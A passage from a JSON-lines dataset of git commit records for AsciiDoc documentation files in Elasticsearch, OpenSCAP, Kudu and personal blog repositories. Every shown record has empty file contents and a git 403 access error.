\/elasticsearch,AshishThakur\/elasticsearch,MjAbuz\/elasticsearch,chirilo\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,artnowo\/elasticsearch,dantuffery\/elasticsearch,Brijeshrpatel9\/elasticsearch,rhoml\/
elasticsearch,a2lin\/elasticsearch,nrkkalyan\/elasticsearch,iantruslove\/elasticsearch,schonfeld\/elasticsearch,JackyMai\/elasticsearch,feiqitian\/elasticsearch,snikch\/elasticsearch,smflorentino\/elasticsearch,kevinkluge\/elasticsearch,ImpressTV\/elasticsearch,thecocce\/elasticsearch,jw0201\/elastic,jpountz\/elasticsearch,vroyer\/elassandra,drewr\/elasticsearch,camilojd\/elasticsearch,zkidkid\/elasticsearch,robin13\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,opendatasoft\/elasticsearch,HonzaKral\/elasticsearch,ImpressTV\/elasticsearch,ouyangkongtong\/elasticsearch,himanshuag\/elasticsearch,lydonchandra\/elasticsearch,abibell\/elasticsearch,ThalaivaStars\/OrgRepo1,jaynblue\/elasticsearch,alexshadow007\/elasticsearch,sdauletau\/elasticsearch,episerver\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,ulkas\/elasticsearch,Ansh90\/elasticsearch,masterweb121\/elasticsearch,btiernay\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,brandonkearby\/elasticsearch,wangyuxue\/elasticsearch,tebriel\/elasticsearch,andrestc\/elasticsearch,Fsero\/elasticsearch,drewr\/elasticsearch,gingerwizard\/elasticsearch,lightslife\/elasticsearch,huypx1292\/elasticsearch,opendatasoft\/elasticsearch,rento19962\/elasticsearch,fekaputra\/elasticsearch,episerver\/elasticsearch,wuranbo\/elasticsearch,djschny\/elasticsearch,anti-social\/elasticsearch,queirozfcom\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,caengcjd\/elasticsearch,naveenhooda2000\/elasticsearch,thecocce\/elasticsearch,Flipkart\/elasticsearch,henakamaMSFT\/elasticsearch,humandb\/elasticsearch,jeteve\/elasticsearch,markharwood\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,NBSW\/elasticsearch,JSCooke\/elasticsearch,Uiho\/elasticsearch,Uiho\/elasticsearch,LeoYao\/elasticsearch,schonfeld\/elasticsearch,chirilo\/elasticsearch,codebunt\/elasticsearch,golubev\/elasticsearch,knight1128\/elasticsearch,slavau\/elasticsearch,bawse\/elasticsearch,NBSW\/elasticsearch,awislowski\/elasticsearch,kcompher\/elasticsearch,Liziyao\/elasticsearch,yongminxia\/elasticsearch,lightslife\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,wbowling\/elasticsearch,mortonsykes\/elasticsearch,brwe\/elasticsearch,MichaelLiZhou\/elasticsearch,avikurapati\/elasticsearch,boliza\/elasticsearch,ckclark\/elasticsearch,kubum\/elasticsearch,sdauletau\/elasticsearch,combinatorist\/elasticsearch,beiske\/elasticsearch,episerver\/elasticsearch,girirajsharma\/elasticsearch,Shekharrajak\/elasticsearch,artnowo\/elasticsearch,milodky\/elasticsearch,sjohnr\/elasticsearch,yanjunh\/elasticsearch,zhiqinghuang\/elasticsearch,zkidkid\/elasticsearch,mute\/elasticsearch,Brijeshrpatel9\/elasticsearch,F0lha\/elasticsearch,rmuir\/elasticsearch,achow\/elasticsearch,robin13\/elasticsearch,kcompher\/elasticsearch,cnfire\/elasticsearch-1,scottsom\/elasticsearch,Clairebi\/ElasticsearchClone,phani546\/elasticsearch,Collaborne\/elasticsearch,bestwpw\/elasticsearch,strapdata\/elassandra-test,ivansun1010\/elasticsearch,pozhidaevak\/elasticsearch,jw0201\/elastic,gfyoung\/elasticsearch,queirozfcom\/elasticsearch,ESamir\/elasticsearch,YosuaMichael\/elasticsearch,vrkansagara\/elasticsearch,clintongormley\/elasticsearch,palecur\/elasticsearch,AleksKochev\/elasticsearch,koxa29\/elasticsearch,obourgain\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,wayeast\/elasticsearch,sjohnr\/elasticsearch,Ton
yChai24\/ESSource,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,winstonewert\/elasticsearch,boliza\/elasticsearch,JackyMai\/elasticsearch,caengcjd\/elasticsearch,Microsoft\/elasticsearch,hafkensite\/elasticsearch,iantruslove\/elasticsearch,vvcephei\/elasticsearch,jchampion\/elasticsearch,springning\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,fooljohnny\/elasticsearch,liweinan0423\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,jbertouch\/elasticsearch,StefanGor\/elasticsearch,kenshin233\/elasticsearch,martinstuga\/elasticsearch,lydonchandra\/elasticsearch,kunallimaye\/elasticsearch,sc0ttkclark\/elasticsearch,njlawton\/elasticsearch,thecocce\/elasticsearch,mjason3\/elasticsearch,MaineC\/elasticsearch,a2lin\/elasticsearch,chrismwendt\/elasticsearch,feiqitian\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,lzo\/elasticsearch-1,diendt\/elasticsearch,milodky\/elasticsearch,overcome\/elasticsearch,iamjakob\/elasticsearch,vrkansagara\/elasticsearch,mikemccand\/elasticsearch,himanshuag\/elasticsearch,IanvsPoplicola\/elasticsearch,scottsom\/elasticsearch,hafkensite\/elasticsearch,huanzhong\/elasticsearch,huanzhong\/elasticsearch,i-am-Nathan\/elasticsearch,humandb\/elasticsearch,micpalmia\/elasticsearch,yynil\/elasticsearch,davidvgalbraith\/elasticsearch,markllama\/elasticsearch,iantruslove\/elasticsearch,AshishThakur\/elasticsearch,KimTaehee\/elasticsearch,markharwood\/elasticsearch,gingerwizard\/elasticsearch,VukDukic\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,alexkuk\/elasticsearch,LewayneNaidoo\/elasticsearch,pranavraman\/elasticsearch,palecur\/elasticsearch,Shepard1212\/elasticsearch,franklanganke\/elasticsearch,cnfire\/elasticsearch-1,PhaedrusTheGreek\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,vietlq\/elasticsearch,combinatorist\/elasticsearch,lydonchandra\/elasticsearch,hafkensite\/elasticsearch,AshishThakur\/elasticsearch,adrianbk\/elasticsearch,amaliujia\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,JervyShi\/elasticsearch,koxa29\/elasticsearch,jaynblue\/elasticsearch,weipinghe\/elasticsearch,trangvh\/elasticsearch,likaiwalkman\/elasticsearch,fekaputra\/elasticsearch,mortonsykes\/elasticsearch,ajhalani\/elasticsearch,gingerwizard\/elasticsearch,iamjakob\/elasticsearch,hirdesh2008\/elasticsearch,hirdesh2008\/elasticsearch,socialrank\/elasticsearch,codebunt\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,achow\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,iacdingping\/elasticsearch,yanjunh\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,loconsolutions\/elasticsearch,SergVro\/elasticsearch,yynil\/elasticsearch,jbertouch\/elasticsearch,martinstuga\/elasticsearch,wangtuo\/elasticsearch,mrorii\/elasticsearch,umeshdangat\/elasticsearch,mute\/elasticsearch,zeroctu\/elasticsearch,strapdata\/elassandra-test,wenpos\/elasticsearch,Collaborne\/elasticsearch,hanswang\/elasticsearch,cwurm\/elasticsearch,socialrank\/elasticsearch,javachengwc\/elasticsearch,sscarduzio\/elasticsearch,infusionsoft\/elasticsearch,HarishAtGitHub\/elasticsearch,djschny\/elasticsearch,huypx1292\/elasticsearch,springning\/elasticsearch,nomoa\/elasticsearch,alexshadow007\/elasticsearch,tcucchietti\/elasticsearch,yanjunh\/elasticsearch,mgalushka\/elasticsearch,Ansh90\/elasticsearch,shreejay\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,springning\/elasticsearch,tebriel\/elasticsearch,andrejserafim\/elasticsearch,hirdesh2008\/elasticsearch,lzo\/elasticsearc
h-1,szroland\/elasticsearch,sneivandt\/elasticsearch,feiqitian\/elasticsearch,mbrukman\/elasticsearch,Uiho\/elasticsearch,linglaiyao1314\/elasticsearch,ulkas\/elasticsearch,diendt\/elasticsearch,Liziyao\/elasticsearch,TonyChai24\/ESSource,franklanganke\/elasticsearch,rento19962\/elasticsearch,smflorentino\/elasticsearch,tebriel\/elasticsearch,dpursehouse\/elasticsearch,HarishAtGitHub\/elasticsearch,lmtwga\/elasticsearch,Widen\/elasticsearch,Asimov4\/elasticsearch,areek\/elasticsearch,sjohnr\/elasticsearch,easonC\/elasticsearch,btiernay\/elasticsearch,MichaelLiZhou\/elasticsearch,rhoml\/elasticsearch,jimczi\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,bestwpw\/elasticsearch,lzo\/elasticsearch-1,dataduke\/elasticsearch,overcome\/elasticsearch,umeshdangat\/elasticsearch,lchennup\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,Fsero\/elasticsearch,lchennup\/elasticsearch,NBSW\/elasticsearch,jeteve\/elasticsearch,Shekharrajak\/elasticsearch,yuy168\/elasticsearch,sneivandt\/elasticsearch,jaynblue\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,xuzha\/elasticsearch,mnylen\/elasticsearch,mohit\/elasticsearch,dataduke\/elasticsearch,wimvds\/elasticsearch,lmtwga\/elasticsearch,boliza\/elasticsearch,ricardocerq\/elasticsearch,Clairebi\/ElasticsearchClone,wittyameta\/elasticsearch,robin13\/elasticsearch,tkssharma\/elasticsearch,hafkensite\/elasticsearch,nomoa\/elasticsearch,MjAbuz\/elasticsearch,rlugojr\/elasticsearch,anti-social\/elasticsearch,davidvgalbraith\/elasticsearch,djschny\/elasticsearch,djschny\/elasticsearch,hanst\/elasticsearch,janmejay\/elasticsearch,tsohil\/elasticsearch,Fsero\/elasticsearch,obourgain\/elasticsearch,robin13\/elasticsearch,trangvh\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,Clairebi\/ElasticsearchClone,wimvds\/elasticsearch,sarwarbhuiyan\/elasticsearch,Shepard1212\/elasticsearch,combinatorist\/elasticsearch,knight1128\/elasticsearch,amaliujia\/elasticsearch,geidies\/elasticsearch,dantuffery\/elasticsearch,loconsolutions\/elasticsearch,infusionsoft\/elasticsearch,ckclark\/elasticsearch,alexshadow007\/elasticsearch,girirajsharma\/elasticsearch,Chhunlong\/elasticsearch,awislowski\/elasticsearch,andrejserafim\/elasticsearch,tahaemin\/elasticsearch,kenshin233\/elasticsearch,hydro2k\/elasticsearch,kkirsche\/elasticsearch,lzo\/elasticsearch-1,wimvds\/elasticsearch,lightslife\/elasticsearch,boliza\/elasticsearch,aglne\/elasticsearch,milodky\/elasticsearch,ivansun1010\/elasticsearch,kkirsche\/elasticsearch,sauravmondallive\/elasticsearch,uschindler\/elasticsearch,kalburgimanjunath\/elasticsearch,mute\/elasticsearch,mcku\/elasticsearch,acchen97\/elasticsearch,petabytedata\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,ulkas\/elasticsearch,truemped\/elasticsearch,wimvds\/elasticsearch,tcucchietti\/elasticsearch,iantruslove\/elasticsearch,episerver\/elasticsearch,sneivandt\/elasticsearch,jimhooker2002\/elasticsearch,markharwood\/elasticsearch,lydonchandra\/elasticsearch,nomoa\/elasticsearch,slavau\/elasticsearch,kaneshin\/elasticsearch,maddin2016\/elasticsearch,StefanGor\/elasticsearch,Chhunlong\/elasticsearch,lmtwga\/elasticsearch,fred84\/elasticsearch,overcome\/elasticsearch,pranavraman\/elasticsearch,nilabhsagar\/elasticsearch,polyfractal\/elasticsearch,gfyoung\/elasticsearch,tebriel\/elasticsearch,MichaelLiZhou\/elasticsearch,Rygbee\/elasticsearch,StefanGor\/elasticsearch,hirdesh2008\/elasticsearch,likaiwalkman\/elasticsearch,beiske\/elasticsearch,umeshdangat\/elasticsearch,skearns64\/elasticsearch,mm0\/elast
icsearch,kaneshin\/elasticsearch,xpandan\/elasticsearch,mm0\/elasticsearch,amit-shar\/elasticsearch,geidies\/elasticsearch,khiraiwa\/elasticsearch,TonyChai24\/ESSource,lmtwga\/elasticsearch,sreeramjayan\/elasticsearch,pritishppai\/elasticsearch,springning\/elasticsearch,jimhooker2002\/elasticsearch,kevinkluge\/elasticsearch,pranavraman\/elasticsearch,huanzhong\/elasticsearch,Liziyao\/elasticsearch,naveenhooda2000\/elasticsearch,feiqitian\/elasticsearch,vrkansagara\/elasticsearch,mm0\/elasticsearch,vietlq\/elasticsearch,elancom\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,alexbrasetvik\/elasticsearch,weipinghe\/elasticsearch,amaliujia\/elasticsearch,codebunt\/elasticsearch,Widen\/elasticsearch,wbowling\/elasticsearch,hanswang\/elasticsearch,jw0201\/elastic,Chhunlong\/elasticsearch,KimTaehee\/elasticsearch,drewr\/elasticsearch,Liziyao\/elasticsearch,mjhennig\/elasticsearch,vroyer\/elassandra,smflorentino\/elasticsearch,strapdata\/elassandra5-rc,hechunwen\/elasticsearch,abibell\/elasticsearch,areek\/elasticsearch,mkis-\/elasticsearch,vietlq\/elasticsearch,SergVro\/elasticsearch,yongminxia\/elasticsearch,andrestc\/elasticsearch,overcome\/elasticsearch,fernandozhu\/elasticsearch,dataduke\/elasticsearch,areek\/elasticsearch,nomoa\/elasticsearch,humandb\/elasticsearch,JSCooke\/elasticsearch,KimTaehee\/elasticsearch,combinatorist\/elasticsearch,himanshuag\/elasticsearch,slavau\/elasticsearch,njlawton\/elasticsearch,btiernay\/elasticsearch,adrianbk\/elasticsearch,knight1128\/elasticsearch,kalburgimanjunath\/elasticsearch,jchampion\/elasticsearch,dataduke\/elasticsearch,Ansh90\/elasticsearch,18098924759\/elasticsearch,tsohil\/elasticsearch,tsohil\/elasticsearch,winstonewert\/elasticsearch,adrianbk\/elasticsearch,hirdesh2008\/elasticsearch,mikemccand\/elasticsearch,schonfeld\/elasticsearch,kcompher\/elasticsearch,ricardocerq\/elasticsearch,AshishThakur\/elasticsearch,jchampion\/elasticsearch,Stacey-Gammon\/elasticsearch,onegambler\/elasticsearch,truemped\/elasticsearch,andrestc\/elasticsearch,ckclark\/elasticsearch,camilojd\/elasticsearch,brwe\/elasticsearch,obourgain\/elasticsearch,nellicus\/elasticsearch,kubum\/elasticsearch,petmit\/elasticsearch,dylan8902\/elasticsearch,vroyer\/elasticassandra,mapr\/elasticsearch,MichaelLiZhou\/elasticsearch,loconsolutions\/elasticsearch,iacdingping\/elasticsearch,18098924759\/elasticsearch,koxa29\/elasticsearch,caengcjd\/elasticsearch,AndreKR\/elasticsearch,sauravmondallive\/elasticsearch,mcku\/elasticsearch,hafkensite\/elasticsearch,lchennup\/elasticsearch,jimhooker2002\/elasticsearch,andrejserafim\/elasticsearch,sc0ttkclark\/elasticsearch,sarwarbhuiyan\/elasticsearch,brandonkearby\/elasticsearch,jsgao0\/elasticsearch,infusionsoft\/elasticsearch,phani546\/elasticsearch,pozhidaevak\/elasticsearch,onegambler\/elasticsearch,markwalkom\/elasticsearch,Clairebi\/ElasticsearchClone,khiraiwa\/elasticsearch,mohit\/elasticsearch,opendatasoft\/elasticsearch,mortonsykes\/elasticsearch,achow\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,PhaedrusTheGreek\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,mjason3\/elasticsearch,hydro2k\/elasticsearch,tahaemin\/elasticsearch,pritishppai\/elasticsearch,ulkas\/elasticsearch,janmejay\/elasticsearch,camilojd\/elasticsearch,karthikjaps\/elasticsearch,knight1128\/elasticsearch,scorpionvicky\/elasticsearch,alexbrasetvik\/elasticsearch,szroland\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,btiernay\/elasticsearch,kevinkluge\/elasticsearch,lightslife\/elasticsearch,springning\/elastics
earch,ivansun1010\/elasticsearch,LeoYao\/elasticsearch,JervyShi\/elasticsearch,lzo\/elasticsearch-1,jw0201\/elastic,zhiqinghuang\/elasticsearch,Helen-Zhao\/elasticsearch,ricardocerq\/elasticsearch,achow\/elasticsearch,karthikjaps\/elasticsearch,glefloch\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,yynil\/elasticsearch,sposam\/elasticsearch,masaruh\/elasticsearch,Collaborne\/elasticsearch,EasonYi\/elasticsearch,fernandozhu\/elasticsearch,drewr\/elasticsearch,cwurm\/elasticsearch,jchampion\/elasticsearch,adrianbk\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jango2015\/elasticsearch,mrorii\/elasticsearch,koxa29\/elasticsearch,peschlowp\/elasticsearch,kingaj\/elasticsearch,sdauletau\/elasticsearch,aglne\/elasticsearch,xingguang2013\/elasticsearch,brandonkearby\/elasticsearch,cnfire\/elasticsearch-1,weipinghe\/elasticsearch,onegambler\/elasticsearch,camilojd\/elasticsearch,pranavraman\/elasticsearch,uschindler\/elasticsearch,szroland\/elasticsearch,sreeramjayan\/elasticsearch,awislowski\/elasticsearch,kunallimaye\/elasticsearch,AndreKR\/elasticsearch,zkidkid\/elasticsearch,AleksKochev\/elasticsearch,Kakakakakku\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,wenpos\/elasticsearch,opendatasoft\/elasticsearch,SergVro\/elasticsearch,luiseduardohdbackup\/elasticsearch,andrestc\/elasticsearch,s1monw\/elasticsearch,Microsoft\/elasticsearch,GlenRSmith\/elasticsearch,mbrukman\/elasticsearch,shreejay\/elasticsearch,sjohnr\/elasticsearch,mbrukman\/elasticsearch,wimvds\/elasticsearch,codebunt\/elasticsearch,mortonsykes\/elasticsearch,phani546\/elasticsearch,nazarewk\/elasticsearch,clintongormley\/elasticsearch,yongminxia\/elasticsearch,Collaborne\/elasticsearch,socialrank\/elasticsearch,beiske\/elasticsearch,Kakakakakku\/elasticsearch,mnylen\/elasticsearch,pozhidaevak\/elasticsearch,vvcephei\/elasticsearch,abhijitiitr\/es,heng4fun\/elasticsearch,sscarduzio\/elasticsearch,Shekharrajak\/elasticsearch,iacdingping\/elasticsearch,javachengwc\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Liziyao\/elasticsearch,xpandan\/elasticsearch,schonfeld\/elasticsearch,schonfeld\/elasticsearch,adrianbk\/elasticsearch,phani546\/elasticsearch,franklanganke\/elasticsearch,Siddartha07\/elasticsearch,Shepard1212\/elasticsearch,tahaemin\/elasticsearch,jsgao0\/elasticsearch,elasticdog\/elasticsearch,palecur\/elasticsearch,tsohil\/elasticsearch,NBSW\/elasticsearch,petmit\/elasticsearch,xingguang2013\/elasticsearch,clintongormley\/elasticsearch,petabytedata\/elasticsearch,s1monw\/elasticsearch,iamjakob\/elasticsearch,ricardocerq\/elasticsearch,areek\/elasticsearch,HarishAtGitHub\/elasticsearch,bestwpw\/elasticsearch,diendt\/elasticsearch,abibell\/elasticsearch,sdauletau\/elasticsearch,tsohil\/elasticsearch,ulkas\/elasticsearch,18098924759\/elasticsearch,kimimj\/elasticsearch,mapr\/elasticsearch,martinstuga\/elasticsearch,fernandozhu\/elasticsearch,zeroctu\/elasticsearch,vrkansagara\/elasticsearch,GlenRSmith\/elasticsearch,karthikjaps\/elasticsearch,huypx1292\/elasticsearch,mcku\/elasticsearch,zeroctu\/elasticsearch,kaneshin\/elasticsearch","old_file":"docs\/java-api\/index_.asciidoc","new_file":"docs\/java-api\/index_.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"81383c4b429dd8db2c5bfa339b4b930242ad9673","subject":"manual.adoc: Fix SCE URL","message":"manual.adoc: Fix SCE URL\n","repos":"ybznek\/openscap,jan-cerny\/openscap,ybznek\/openscap,redhatrises\/openscap,ybznek\/openscap,mpreisler\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,mpreisler\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,jan-cerny\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,redhatrises\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap,ybznek\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"68c185747ddefb0f085ac2e5a4f460e957e802d8","subject":"release notes: changes to ksck reporting updates","message":"release notes: changes to ksck reporting updates\n\nCovers:\nhttps:\/\/github.com\/apache\/kudu\/commit\/d869b8033ac0026d585ab1d5bc69a1ba205357fa\n\nChange-Id: Ia7bae8e1d298f4222bd1697f44098630000b5880\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9593\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu Jenkins\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5fc3a64b845220328720a57626fae5b0921eb6e","subject":"Followup to 7eaeb6d9: fix typo in schema_design.adoc","message":"Followup to 7eaeb6d9: fix typo in schema_design.adoc\n\nAccidentally wrote 'unix_microtime' instead of 'unixtime_micros' in the\ndocumentation in the previous patch.\n\nI also separated out the 64-bit types for better clarity, since it\nwasn't obvious before that 'unixtime_micros' is a 64-bit type.\n\nChange-Id: Ied008e4ae1dea0243cb944470cbad2053bebd3d7\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4354\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo 
<866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19957d5c5b47afb7a4bfc384999de53a3aac000","subject":"Update 2016-12-18-goggles.adoc","message":"Update 2016-12-18-goggles.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-12-18-goggles.adoc","new_file":"_posts\/2016-12-18-goggles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3c0cfb88d0de727263b94876311789d203ee298","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a673b76773796a2cb5bbd91c777da8b901f2eba","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d00f21ee09474148fe65c7551c1f7a259fa6338f","subject":"docs: devel: clarify parsing and model conversion.","message":"docs: devel: clarify parsing and model conversion.\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/devel\/design.adoc","new_file":"docs\/devel\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cce24c3859f11de4e3238572d620339610a18937","subject":"Update 2015-07-06-Liebes-Tagebuch.adoc","message":"Update 
2015-07-06-Liebes-Tagebuch.adoc","repos":"visionui\/visionui.github.io,visionui\/visionui.github.io,visionui\/visionui.github.io","old_file":"_posts\/2015-07-06-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-07-06-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/visionui\/visionui.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5679191be806677b59b4bd6dcbe16c4f5e6ffc1","subject":"Update 2017-12-01-SVG-and-Angular.adoc","message":"Update 2017-12-01-SVG-and-Angular.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-01-SVG-and-Angular.adoc","new_file":"_posts\/2017-12-01-SVG-and-Angular.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d1e51355a72c7686fd5cdc65258af38cf9555de","subject":"Added a README for the creation of OSGi application images.","message":"Added a README for the creation of OSGi application images.\n\nThe document describes the OsgiImagePlugin used to generate executable\nimages for the LineDJ applications.\n","repos":"oheger\/LineDJ","old_file":"images\/README.adoc","new_file":"images\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oheger\/LineDJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bac648126b449bba98d927ebf336ee282ac775e2","subject":"Update 2015-03-12-testig.adoc","message":"Update 2015-03-12-testig.adoc","repos":"jimmidyson\/testblog,jimmidyson\/testblog,jimmidyson\/testblog","old_file":"_posts\/2015-03-12-testig.adoc","new_file":"_posts\/2015-03-12-testig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jimmidyson\/testblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a19aca198fc903cf6398c5e7102711e104e6701a","subject":"Update 2016-03-18-Introduction-a-Bitcoin.adoc","message":"Update 